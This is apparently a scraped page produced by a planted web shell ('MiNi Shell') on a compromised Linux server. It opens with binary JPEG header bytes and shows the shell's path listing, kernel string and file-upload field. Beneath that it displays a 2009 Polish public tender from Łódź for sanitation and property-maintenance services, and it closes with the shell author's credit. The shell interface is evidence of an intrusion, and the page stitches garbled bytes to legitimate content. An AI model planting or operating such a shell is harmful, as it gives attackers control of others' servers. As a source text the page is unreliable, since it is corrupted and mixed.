JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090605/179408-N-2009.html

<p class="kh_header"><b>Łódź: Świadczenie Usług Należytego Utrzymania Stanu Sanitarno- Porządkowego Nieruchomości Wraz z Terenami Przynależnymi</b><br>
<b>Numer ogłoszenia: 179408 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Bałuty "Bałuty Nowe" , ul. Sędziowska 16, 91-304 Łódź, woj. łódzkie, tel. 042 6546896, faks 042 6546896.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.biuletyn.abip.pl/an-balnow/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie Usług Należytego Utrzymania Stanu Sanitarno- Porządkowego Nieruchomości Wraz z Terenami Przynależnymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES RZECZOWY ZAMÓWIENIA: 
świadczenie usług należytego utrzymania stanu sanitarno-porządkowego posesji wraz z terenami przynależnymi.

ZAMÓWIENIE ZOSTAŁO PODZIELONE NA TRZY CZĘŚCI.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne 
części zamówienia lub na wszystkie z nich. 


Zakres rzeczowy zamówienia obejmuje następujące prace:

A. bieżące czynności podstawowe
1.	bieżące usuwanie/zamiatanie, zbieranie, zmywanie odpadów i innych zanieczyszczeń z pomieszczeń i urządzeń budynku przeznaczonych do ogólnego użytku: korytarze, klatki schodowe, sienie, kabiny dźwigowe, WC, pralnie, suszarnie, strychy itp.
2.	bieżące usuwanie odpadów i innych zanieczyszczeń z niezabudowanych części nieruchomości tj. podwórzy, przejść, bram, chodników, trawników, opasek ochronnych i jezdni osiedlowych.
3.	od chwili wystąpienia przymrozków do ich ustąpienia codzienne opalanie ubikacji przeznaczonych do wspólnego użytku. Zakup węgla należy do obowiązków Zleceniobiorcy. Ilość ubikacji do opalania węglem - 2 sztuki.
          Ubikacje znajdują się przy - ul Zgierskiej 107, ul Wspólnej 9.              Zużycie węgla w zależności od temperatury zewnętrznej od 100 do 200 kg na jedną ubikację rocznie.
4.	Zleceniobiorca zobowiązany jest wywieźć własnym transportem i na własny koszt odpady nie nadające się do składowania w pojemnikach na śmieci /tzn. liście, gałęzie i inne nieczystości nie będące odpadami komunalnymi wielkogabarytowymi/.
5.        Zleceniobiorca zobowiązany jest do ustawienia po 5 sztuk w każdym rejonie (według uzgodnień ze Zleceniodawcą) oznaczonych nalepką koszy w kolorze pomarańczowym przeznaczonych na psie nieczystości. Zobowiązany jest do wykładania  koszy workami foliowymi  a także ich bieżącego opróżniania
6.        Zleceniobiorca zobowiązany jest do ustawienia po 5 szt. w każdym rejonie (według uzgodnień ze Zleceniodawcą) koszy ulicznych na odpady stałe w kolorze niebieskim.
           Zobowiązany jest do bieżącego wykładania  koszy workami foliowymi  a także ich opróżniania.
B.	bieżące sprzątanie w okresie zimy - polegające na
1.	usuwaniu śniegu, lodu, błota z chodników, dojść, dojazdów do garaży, ulic osiedlowych, placów zabaw, parkingów osiedlowych, oczyszczanie pokryw studzienek telefonicznych, kanalizacyjnych oraz udrażnianie /odśnieżanie, odkuwanie lodu/ studzienek ściekowych. Czynności te powinny być wykonane do godz. 6.30 rano.
2.	w przypadku opadów śniegu lub oblodzenia praca powinna być wykonana systematycznie na bieżąco, aż do osiągnięcia stanu zapewniającego bezpieczeństwo poruszających się ludzi i pojazdów.
3.        w przypadku wystąpienia gołoledzi wymagane jest posypywanie piaskiem w celu uszorstnienia nawierzchni bez użycia soli i innych środków chemicznych. Zakup piasku należy do obowiązków Zleceniobiorcy.
4.        usuwaniu sopli z dachów. Koszty użycia sprzętu specjalistycznego obciążają Zleceniodawcę.
C.	bieżące sprzątanie - konserwacja terenów zielonych poprzez grabienie, rekultywacja i odtwarzanie  zniszczonych części trawników i kwietników, podlewanie nowych nasadzeń,  sianie trawy i jej koszenie w okresie maj - wrzesień.
           Wywożenie skoszonej trawy w workach foliowych winno odbywać się niezwłocznie po zakończeniu koszenia.
                     Zleceniobiorca winien mieć zawartą umowę z firmą świadczącą usługi  kompostowania.

D.      w zakresie prac wewnątrz budynków oraz mycia elementów stałych budynków z częstotliwością zapewniającą należyty stan sanitarny i porządkowy
1.	mycie klatek schodowych, lamperii, balustrad, drzwi, skrzynek listowych i liczników.
2.        mycie okien i luksferów na klatkach schodowych i w pomieszczeniach ogólnego użytku /pralnie, suszarnie itp./
3.	wykonywanie czynności związanych z dezynfekcją, dezynsekcją i deratyzacją pomieszczeń, urządzeń oraz terenu nieruchomości przeznaczonych do wspólnego użytku. Zakup środków należy do obowiązków Zleceniobiorcy.
4.        obowiązkowe przeprowadzanie prewencyjnej deratyzacji w terminach:
           20 marzec - 20 kwiecień  oraz  15 październik - 15 listopad
5.        oznakowanie miejsc wyłożenia trutek oraz zabezpieczenie przed dostępem do nich dzieci, ptactwa i zwierząt
E.
1.	dokonywanie codziennego przeglądu obsługiwanego terenu ze szczególnym uwzględnieniem: 
a)	- właściwego wykonywania zadań wynikających z przyjętych obowiązków,
b)	- terminowego wykonywania świadczeń wynikających z umów zawartych z usługodawcami
2.	niezwłoczne zawiadamianie Zleceniodawcy o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych znajdujących się na terenie nieruchomości.
3.	zgłaszanie potrzeb dotyczących renowacji zieleni oraz przycinania i wycięcia drzew.
4.	udział w okresowych kontrolach sanitarno-porządkowych organizowanych na terenie objętym umową oraz wykonywanie zaleceń wynikających z tych kontroli.
5.	bezzwłoczne wywieszanie dostarczonych przez Zleceniodawcę informacji w gablotach na klatkach schodowych oraz dopilnowanie ich utrzymania.
6.	terminowe doręczanie Najemcom lokali mieszkalnych i użytkowych oraz użytkownikom zawiadomień o zmianach stawek czynszowych, książeczek czynszowych, powiadomień o konieczności wnoszenia dopłat bądź potrąceń bonifikat za zimną wodę, powiadomień o stanie konta najemcy, upomnień o zaległościach czynszowych i wynikających z innych tytułów w terminie 7 dni od daty przejęcia dokumentów.
7.	terminowe wywieszanie flag państwowych, papieskich i miejskich, w dniach świąt i uroczystości państwowych na terenie wszystkich nieruchomości; zakup flag należy do obowiązków Zleceniobiorcy.
8.	bieżąca wymiana uszkodzonych żarówek w klatkach schodowych i korytarzach w posesjach objętych umową; zakup żarówek należy do obowiązków Zleceniobiorcy.
9.	bieżące usuwanie z budynków oraz pomieszczeń i urządzeń przeznaczonych do wspólnego użytku ogłoszeń, plakatów, afiszy, napisów, rysunków umieszczonych bez zgody administracji.
10.	bieżące opróżnianie koszy przydomowych i ich odkażanie.
11.	bieżące odkażanie dołów kloacznych, ubikacji oraz rynsztoków podwórzowych i ulicznych wapnem chlorowanym lub lizolem; zakup środków chemicznych należy do Zleceniobiorcy.
12.	bieżące mycie i dezynfekowanie pergoli i zsypów, utrzymanie drożności zsypów.
13.	terminowe wystawianie pojemników na śmieci w miejsce dostępne dla odbiorców śmieci oraz ich wstawianie do pergoli, zsypów i innych miejsc do tego wyznaczonych z częstotliwością wskazaną przez Zleceniodawcę.
14.	zabezpieczanie grzejników na parterach budynków, rur wodociągowych w ubikacjach ogólnych oraz hydrantów - zdrojów podwórzowych na okres zimy; zakup materiałów niezbędnych do tego celu należy do obowiązków Zleceniobiorcy.

Niniejszym postępowaniem objęty jest obszar o powierzchni ogółem:
eksploatacyjna wewnętrzna	     	16 322,94  m2
eksploatacyjna zewnętrzna   	51 866,73 m2
tereny zielone      	                          16 122,71 m2
okna i luksfery			   1 261,32 m2     

Wskazany obszar w niniejszym postępowaniu został podzielony na trzy części..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.20.00.00-9, 90.21.00.00-2, 90.21.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium jest warunkiem ważności oferty. Wysokość wadium w niniejszym postępowaniu wynosi: 
      -  dla Rejonu  I -   2.000 zł (dwa tysiące złotych)  
       - dla Rejonu  II -  2.000 zł (dwa tysiące  złotych 
      - dla Rejonu  III - 2.000 zł (dwa tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, w tym nie podlegający wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 i ust. 2 (potwierdzenie: oświadczenie oferenta do art. 22 ust.1, którego wzór stanowi załącznik nr 2 do niniejszej specyfikacji):
2. Wykonawca musi spełniać warunki określone w art. 22 ust. 1 ustawy - Prawo
          zamówień publicznych, tj.:
          2.1. posiadać uprawnienia niezbędne do wykonania zamówienia (potwierdzenie: oświadczenie wykonawcy do art. 22 ust. 1)
          2.2. posiadać niezbędną wiedzę i doświadczenie (potwierdzenie: oświadczenie wykonawcy do art. 22 ust.1)
          2.3. posiadać potencjał techniczny (potwierdzenie: oświadczenie wykonawcy o sprzęcie, którym dysponuje lub będzie dysponował Wykonawca)
                              WYMAGANIA ZAMAWIAJĄCEGO:
                              Wykonawca powinien dysponować minimum (dla każdego rejonu):
-	Kosiarki - 5 szt.
-	Ciągnik dwuosiowy z przyczepą lub samochód ciężarowy - 1 szt.
-	Urządzenie z pługiem do odśnieżania - 1 szt.
Wykonawca może ująć sprzęt nie stanowiący jego własności. Jeżeli Wykonawca nie dysponuje narzędziami i urządzeniami,  dołącza do SIWZ pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi będzie dysponował.
            2.4. dysponować osobami zdolnymi do wykonania zamówienia (potwierdzenie: wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia)  
                              WYMAGANIA ZAMAWIAJĄCEGO:
                              Wymagana minimalna liczba pracowników: 
                              -  20 pracowników dla REJONU Pierwszego
                              -   15 pracowników dla REJONU Drugiego
                              -   25 pracowników dla REJONU Trzeciego       
                            Jeżeli Wykonawca nie dysponuje osobami zdolnymi do wykonania zamówienia, dołącza pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, które będą uczestniczyć w realizacji zamówienia. 
               2.5. znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (potwierdzenie: oświadczenie wykonawcy do art. 22 ust.1)
3.  Przyjmuje się sposób oceny spełniania postawionych warunków na zasadzie spełnia lub nie spełnia, w oparciu o wymagane i dostarczone przez wykonawców oświadczenia i dokumenty (określone w pkt 5 SIWZ)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony - Formularz oferty (Załącznik Nr 3).
2.	Wypełniony - Formularz cenowy (Załącznik Nr 4).
3.	Oświadczenie wykonawcy, że spełnia warunki wymagane art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 2).
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
W przypadku składania oferty przez podmioty ubiegające się wspólnie o udzielenie zamówienia właściwe dokumenty muszą być złożone przez każdy podmiot.
5.      Oświadczenie wykonawcy potwierdzające, że wykonawca nie zalega z opłacaniem podatków.
6.	Oświadczenie Wykonawcy potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne.
7.	Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
Wykonawca powinien być ubezpieczony od OC w wysokości co najmniej 50.000,00zł na każdy rejon. W przypadku złożenia oferty na dwie lub trzy części zamówienia, należy załączyć dokument potwierdzający wysokość kwoty ubezpieczeniowej równej sumie wymaganych kwot dla poszczególnych rejonów. 
8.	Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. w formie spółki cywilnej).
9.      Wykaz posiadanego przez wykonawcę sprzętu (Załącznik nr 5)
10.  Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia      postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi zostały wykonana należycie (załącznik nr 6)
11.    Dowód wniesienia wadium.
12.    Pełnomocnictwo do podpisania oferty.
13.    Parafowany wzór umowy (Załącznik nr 7).
14.    Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (Załącznik nr 8)
Dokumenty wymienione powyżej mogą być przedstawione w formie oryginałów albo kserokopii poświadczonych za zgodność z oryginałem przez osobę uprawnioną do występowania w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.biuletyn.abip.pl/an-balnow/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ADMINISTRACJA NIERUCHOMOŚCIMI ŁÓDŹ - BAŁUTY BAŁUTY NOWE
91-304 Łódź,  ul. Sędziowska 16
tel./fax (042) 654 - 68- 96.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 09:00, miejsce: ADMINISTRACJA NIERUCHOMOŚCIMI ŁÓDŹ - BAŁUTY BAŁUTY NOWE
91-304 Łódź,  ul. Sędziowska 16
tel./fax (042) 654 - 68- 96 
sekretariat pok. nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com